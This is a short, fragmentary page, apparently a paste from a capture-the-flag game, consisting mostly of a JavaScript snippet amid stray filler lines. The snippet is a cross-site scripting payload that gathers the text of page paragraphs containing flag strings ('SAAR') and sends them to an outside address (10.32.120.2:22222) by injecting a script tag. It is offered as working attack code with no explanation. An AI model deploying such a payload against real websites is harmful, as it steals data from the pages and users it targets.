AK
Size: a a a
AK
R
(() => {
console.log('kks with <3')
const flags = Array.from(document.querySelectorAll('p')).map(e => e.innerText).filter(e => e.includes('SAAR')).join(',')
const tag = document.createElement('script')
console.log(tag)
tag.src = `http://10.32.120.2:22222/?data=${flags}`
document.body.appendChild(tag)
})()
AK
AK
AK
AK